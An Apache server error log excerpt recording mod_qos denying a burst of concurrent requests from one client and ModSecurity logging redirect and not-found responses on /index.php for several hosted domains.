[Tue May 26 19:59:37.729490 2026] [qos:error] [pid 93576:tid 93725] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUWDRMqfxdEDkoszy8AAAAA0
[Tue May 26 19:59:37.730966 2026] [qos:error] [pid 93576:tid 93806] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUWDRMqfxdEDkoszy8QAAAF4
[Tue May 26 19:59:37.735824 2026] [qos:error] [pid 93868:tid 94335] [client 45.148.10.120:34920] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUUqK9k_ZUB2Vp258ogAAAdw
[Tue May 26 19:59:37.736692 2026] [qos:error] [pid 93868:tid 94375] [client 45.148.10.120:35398] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUUqK9k_ZUB2Vp258owAAAgQ
[Tue May 26 19:59:37.744941 2026] [qos:error] [pid 93576:tid 93810] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUWDRMqfxdEDkoszy8gAAAGI
[Tue May 26 19:59:37.754307 2026] [qos:error] [pid 93576:tid 93767] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUWDRMqfxdEDkoszy8wAAADc
[Tue May 26 19:59:37.759759 2026] [qos:error] [pid 93868:tid 94281] [client 45.148.10.120:34972] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUUqK9k_ZUB2Vp258pQAAAaY
[Tue May 26 19:59:37.877913 2026] [qos:error] [pid 93868:tid 94328] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUUqK9k_ZUB2Vp258pwAAAdU
[Tue May 26 19:59:37.880170 2026] [qos:error] [pid 93576:tid 93771] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUWDRMqfxdEDkoszy9wAAADs
[Tue May 26 19:59:37.880567 2026] [qos:error] [pid 93868:tid 94379] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUUqK9k_ZUB2Vp258qAAAAgg
[Tue May 26 19:59:37.884086 2026] [qos:error] [pid 93868:tid 94323] [client 45.148.10.120:34948] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUUqK9k_ZUB2Vp258qQAAAdA
[Tue May 26 19:59:37.885499 2026] [qos:error] [pid 93576:tid 93809] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUWDRMqfxdEDkoszy-AAAAGE
[Tue May 26 19:59:37.885807 2026] [qos:error] [pid 93868:tid 94332] [client 45.148.10.120:34920] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUUqK9k_ZUB2Vp258qgAAAdk
[Tue May 26 19:59:37.891899 2026] [qos:error] [pid 93868:tid 94357] [client 45.148.10.120:35398] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUUqK9k_ZUB2Vp258qwAAAfI
[Tue May 26 19:59:37.903505 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUWDRMqfxdEDkoszy-gAAACw
[Tue May 26 19:59:37.907911 2026] [qos:error] [pid 93576:tid 93784] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUWDRMqfxdEDkoszy_AAAAEg
[Tue May 26 19:59:37.908719 2026] [qos:error] [pid 93868:tid 94308] [client 45.148.10.120:34972] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUUqK9k_ZUB2Vp258rAAAAcE
[Tue May 26 19:59:38.029366 2026] [qos:error] [pid 93576:tid 93751] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUmDRMqfxdEDkoszy_QAAACc
[Tue May 26 19:59:38.030144 2026] [qos:error] [pid 93868:tid 94306] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp258rQAAAb8
[Tue May 26 19:59:38.034996 2026] [qos:error] [pid 93868:tid 94359] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp258rgAAAfQ
[Tue May 26 19:59:38.038050 2026] [qos:error] [pid 93868:tid 94350] [client 45.148.10.120:34948] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp258rwAAAes
[Tue May 26 19:59:38.038150 2026] [qos:error] [pid 93868:tid 94261] [client 45.148.10.120:34920] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp258sAAAAZI
[Tue May 26 19:59:38.038997 2026] [qos:error] [pid 93576:tid 93759] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUmDRMqfxdEDkoszzAAAAAC8
[Tue May 26 19:59:38.045312 2026] [qos:error] [pid 93868:tid 94349] [client 45.148.10.120:35398] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp258sQAAAeo
[Tue May 26 19:59:38.060439 2026] [qos:error] [pid 93868:tid 94285] [client 45.148.10.120:34972] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp258sgAAAao
[Tue May 26 19:59:38.061960 2026] [qos:error] [pid 93576:tid 93761] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUmDRMqfxdEDkoszzAQAAADE
[Tue May 26 19:59:38.064579 2026] [qos:error] [pid 93576:tid 93808] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUmDRMqfxdEDkoszzAgAAAGA
[Tue May 26 19:59:38.275077 2026] [qos:error] [pid 93576:tid 93782] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUmDRMqfxdEDkoszzBQAAAEY
[Tue May 26 19:59:38.277870 2026] [security2:error] [pid 93868:tid 94381] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUEqK9k_ZUB2Vp258WwAAAgo"]
[Tue May 26 19:59:38.278313 2026] [qos:error] [pid 93868:tid 94283] [client 45.148.10.120:34920] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp258twAAAag
[Tue May 26 19:59:38.278463 2026] [security2:error] [pid 93868:tid 94300] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUEqK9k_ZUB2Vp258VwAAAbk"]
[Tue May 26 19:59:38.280058 2026] [security2:error] [pid 106517:tid 106680] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUIZZc2DoU1lPnP1QdwAAAKI"]
[Tue May 26 19:59:38.280947 2026] [security2:error] [pid 106517:tid 106722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUIZZc2DoU1lPnP1QdAAAAMw"]
[Tue May 26 19:59:38.291969 2026] [security2:error] [pid 106517:tid 106731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUIZZc2DoU1lPnP1QeAAAANU"]
[Tue May 26 19:59:38.297380 2026] [security2:error] [pid 106517:tid 106763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUIZZc2DoU1lPnP1QfQAAAPU"]
[Tue May 26 19:59:38.311905 2026] [qos:error] [pid 93868:tid 94294] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuUkqK9k_ZUB2Vp258xgAAAbM
[Tue May 26 19:59:38.322646 2026] [security2:error] [pid 106517:tid 106742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUIZZc2DoU1lPnP1QggAAAOA"]
[Tue May 26 19:59:38.323243 2026] [qos:error] [pid 93868:tid 94268] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuUkqK9k_ZUB2Vp258yAAAAZk
[Tue May 26 19:59:38.333727 2026] [security2:error] [pid 106517:tid 106737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUIZZc2DoU1lPnP1QdQAAANs"]
[Tue May 26 19:59:38.336378 2026] [security2:error] [pid 106517:tid 106705] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUIZZc2DoU1lPnP1QgwAAALs"]
[Tue May 26 19:59:38.338826 2026] [security2:error] [pid 93868:tid 94291] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUEqK9k_ZUB2Vp258YAAAAbA"]
[Tue May 26 19:59:38.343958 2026] [security2:error] [pid 106517:tid 106729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUIZZc2DoU1lPnP1QfAAAANM"]
[Tue May 26 19:59:38.344220 2026] [security2:error] [pid 93576:tid 93832] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUGDRMqfxdEDkoszytwAAAHg"]
[Tue May 26 19:59:38.345006 2026] [security2:error] [pid 93576:tid 93749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUGDRMqfxdEDkoszyuwAAACU"]
[Tue May 26 19:59:38.358393 2026] [security2:error] [pid 93576:tid 93730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUGDRMqfxdEDkoszyvAAAABI"]
[Tue May 26 19:59:38.366952 2026] [security2:error] [pid 106517:tid 106665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUIZZc2DoU1lPnP1QhQAAAJQ"]
[Tue May 26 19:59:38.369382 2026] [security2:error] [pid 93868:tid 94330] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUUqK9k_ZUB2Vp258fQAAAdc"]
[Tue May 26 19:59:38.375920 2026] [security2:error] [pid 93576:tid 93803] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUGDRMqfxdEDkoszywQAAAFs"]
[Tue May 26 19:59:38.383268 2026] [security2:error] [pid 93576:tid 93748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUWDRMqfxdEDkoszy2QAAACQ"]
[Tue May 26 19:59:38.389788 2026] [security2:error] [pid 93576:tid 93815] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUGDRMqfxdEDkoszyuQAAAGc"]
[Tue May 26 19:59:38.390766 2026] [security2:error] [pid 106517:tid 106682] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUIZZc2DoU1lPnP1QfwAAAKQ"]
[Tue May 26 19:59:38.391645 2026] [security2:error] [pid 93576:tid 93735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUWDRMqfxdEDkoszy3AAAABc"]
[Tue May 26 19:59:38.407479 2026] [security2:error] [pid 93868:tid 94360] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUUqK9k_ZUB2Vp258fwAAAfU"]
[Tue May 26 19:59:38.416647 2026] [security2:error] [pid 93576:tid 93800] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUGDRMqfxdEDkoszyvwAAAFg"]
[Tue May 26 19:59:38.423859 2026] [security2:error] [pid 106517:tid 106721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUYZZc2DoU1lPnP1QpAAAAMs"]
[Tue May 26 19:59:38.432440 2026] [security2:error] [pid 106517:tid 106753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUYZZc2DoU1lPnP1QqQAAAOs"]
[Tue May 26 19:59:38.435589 2026] [security2:error] [pid 106517:tid 106716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUYZZc2DoU1lPnP1QtQAAAMY"]
[Tue May 26 19:59:38.464292 2026] [security2:error] [pid 93576:tid 93805] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUWDRMqfxdEDkoszy3QAAAF0"]
[Tue May 26 19:59:38.466581 2026] [security2:error] [pid 93868:tid 94282] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUUqK9k_ZUB2Vp258hgAAAac"]
[Tue May 26 19:59:38.466832 2026] [security2:error] [pid 93868:tid 94311] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUUqK9k_ZUB2Vp258gwAAAcQ"]
[Tue May 26 19:59:38.467804 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUWDRMqfxdEDkoszy2wAAAHY"]
[Tue May 26 19:59:38.469761 2026] [security2:error] [pid 93868:tid 94333] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuUUqK9k_ZUB2Vp258hAAAAdo"]
[Tue May 26 19:59:38.557647 2026] [qos:error] [pid 93868:tid 94304] [client 45.148.10.120:35284] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp2588gAAAb0
[Tue May 26 19:59:38.573301 2026] [qos:error] [pid 93868:tid 94283] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp2588wAAAag
[Tue May 26 19:59:38.576631 2026] [qos:error] [pid 93576:tid 93798] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUmDRMqfxdEDkoszzNQAAAFY
[Tue May 26 19:59:38.588246 2026] [qos:error] [pid 93868:tid 94334] [client 45.148.10.120:34982] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp2589AAAAds
[Tue May 26 19:59:38.591034 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUmDRMqfxdEDkoszzNgAAACo
[Tue May 26 19:59:38.617464 2026] [qos:error] [pid 93576:tid 93821] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUmDRMqfxdEDkoszzNwAAAG0
[Tue May 26 19:59:38.620235 2026] [qos:error] [pid 93576:tid 93757] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUmDRMqfxdEDkoszzOAAAAC0
[Tue May 26 19:59:38.620479 2026] [qos:error] [pid 93868:tid 94324] [client 45.148.10.120:35050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp2589wAAAdE
[Tue May 26 19:59:38.623282 2026] [qos:error] [pid 93868:tid 94294] [client 45.148.10.120:35074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp258-AAAAbM
[Tue May 26 19:59:38.629515 2026] [qos:error] [pid 93868:tid 94295] [client 45.148.10.120:35142] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp258-QAAAbQ
[Tue May 26 19:59:38.708075 2026] [qos:error] [pid 93868:tid 94361] [client 45.148.10.120:35284] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp258_AAAAfY
[Tue May 26 19:59:38.708316 2026] [security2:error] [pid 106517:tid 106669] [client 77.228.120.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuUoZZc2DoU1lPnP1Q6gAAAJg"]
[Tue May 26 19:59:38.726241 2026] [qos:error] [pid 93576:tid 93811] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUmDRMqfxdEDkoszzPgAAAGM
[Tue May 26 19:59:38.729427 2026] [qos:error] [pid 93868:tid 94307] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp258_QAAAcA
[Tue May 26 19:59:38.735904 2026] [qos:error] [pid 93868:tid 94342] [client 45.148.10.120:34982] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp258_gAAAeM
[Tue May 26 19:59:38.745847 2026] [qos:error] [pid 93576:tid 93826] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUmDRMqfxdEDkoszzPwAAAHI
[Tue May 26 19:59:38.769422 2026] [qos:error] [pid 93576:tid 93749] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUmDRMqfxdEDkoszzQAAAACU
[Tue May 26 19:59:38.771322 2026] [qos:error] [pid 93868:tid 94276] [client 45.148.10.120:35050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp258_wAAAaE
[Tue May 26 19:59:38.771664 2026] [qos:error] [pid 93576:tid 93797] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUmDRMqfxdEDkoszzQQAAAFU
[Tue May 26 19:59:38.775388 2026] [qos:error] [pid 93868:tid 94368] [client 45.148.10.120:35074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp259AAAAAf0
[Tue May 26 19:59:38.784689 2026] [qos:error] [pid 93868:tid 94262] [client 45.148.10.120:35142] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp259AQAAAZM
[Tue May 26 19:59:38.868917 2026] [qos:error] [pid 93868:tid 94286] [client 45.148.10.120:35284] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp259BgAAAas
[Tue May 26 19:59:38.877907 2026] [qos:error] [pid 93576:tid 93763] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUmDRMqfxdEDkoszzQgAAADM
[Tue May 26 19:59:38.884162 2026] [qos:error] [pid 93868:tid 94360] [client 45.148.10.120:34982] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp259CQAAAfU
[Tue May 26 19:59:38.887384 2026] [qos:error] [pid 93868:tid 94288] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp259CgAAAa0
[Tue May 26 19:59:38.900915 2026] [qos:error] [pid 93576:tid 93807] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUmDRMqfxdEDkoszzQwAAAF8
[Tue May 26 19:59:38.920211 2026] [qos:error] [pid 93576:tid 93716] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUmDRMqfxdEDkoszzRAAAAAQ
[Tue May 26 19:59:38.921699 2026] [qos:error] [pid 93868:tid 94296] [client 45.148.10.120:35050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp259CwAAAbU
[Tue May 26 19:59:38.924159 2026] [qos:error] [pid 93576:tid 93722] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUmDRMqfxdEDkoszzRQAAAAo
[Tue May 26 19:59:38.926827 2026] [qos:error] [pid 93868:tid 94343] [client 45.148.10.120:35074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp259DAAAAeQ
[Tue May 26 19:59:38.941980 2026] [qos:error] [pid 93868:tid 94370] [client 45.148.10.120:35142] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUkqK9k_ZUB2Vp259DgAAAf8
[Tue May 26 19:59:39.020983 2026] [qos:error] [pid 93868:tid 94305] [client 45.148.10.120:35284] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU0qK9k_ZUB2Vp259DwAAAb4
[Tue May 26 19:59:39.027052 2026] [qos:error] [pid 93576:tid 93755] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuU2DRMqfxdEDkoszzRwAAACs
